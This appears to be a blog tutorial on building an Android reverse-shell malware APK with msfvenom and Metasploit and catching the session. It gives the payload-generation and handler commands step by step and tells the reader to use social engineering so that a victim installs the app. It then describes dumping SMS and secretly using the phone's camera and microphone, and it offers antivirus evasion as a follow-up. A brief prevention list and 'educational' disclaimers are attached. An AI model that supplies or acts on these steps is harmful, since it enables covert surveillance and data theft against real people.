- Msfvenom is a part of Metasploit Framework which is used to generate Metasploit payloads.
- Metasploit framework is a penetration testing framework used to find and aid vulnerabilities.
- For this tutorial I’m using the Linux distro Kali Linux.
THIS IS ONLY FOR EDUCATIONAL PURPOSES
Myself or Cybrot will not be held responsible for any of your actions.
How to create a Malware?
- Open up Kali linux
- Click on terminal and type the following command to create a payload:
msfvenom -p android/meterpreter/reverse_tcp LHOST= <yourIP> LPORT= 4444 R> <name of your virus>
Note:
-p payload
LHOST -> your IP
LPORT -> Port to be used
R -> Name of the virus
Payload size may be different on different systems based on the given payload.
- In another terminal type in msfconsole.
Note – Msfconsole is the way of opening the Metasploit framework.
- Once Metasploit boots up it should look something like this:
Note- Don’t worry if the banner shown in yours is not the same as shown in the above image. It changes every time you boot up Metasploit and doesn’t have much importance.
__It’S jUsT a BaNNeR__
- Next to where it says msf6 type in the following commands:
- use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
- exploit
- The virus we created in step2 will appear in your provided location.
- The virus you created must be sent to the victim. You should make him install the malware you created in his phone. Use a bit of social engineering to lure the victim in to your trap.
- Once the victim has installed your malware in his device and has ran the app, you will get a reverse session as shown below:
- After this we have full access of the phone.
Use option ? to see the entire help list
Common commands to try are sysinfo to see system info and sms_dump to dump SMS.
We can even turn on the victims’ phone camera, mic and take screenshots and sent SMS to other contacts, all these without the knowledge of the victim. This is how dangerous this payload can be.
Things to Note
- You can try this out only of your local area network (Home WIFI etc).
- To carry out this outside your local area network, you may need a static IP and a port forwarding router.
- This will only work as long as the malware exists in the victims’ phone and the victim’s phone is connected to the internet.
How to prevent these types of attacks?
- Install apps from known sources only.
- Don’t install suspicious apk’s.
- Always use antivirus.
- Never click on unknown links
- Never download unknown .doc or .pdf files.
- Never download modded or cracked apk’s as they may contain these kinds of malwares bridged on to their codes.
Summary
- With this article you would have understood how to create a reverse_shell virus and how to stay away from such traps.
- Since the apk is not signed it can be easily detected by antiviruses. If you want to know how to sign an apk in order to make the virus undetectable do let us know and I’ll make sure to publish an article on that too.
- Please do not use it for any illegal purposes and please do respect others privacy.
THIS IS ONLY FOR EDUCATIONAL PURPOSES
Thanks for reading this article and I hope that you would have learnt something new with this.
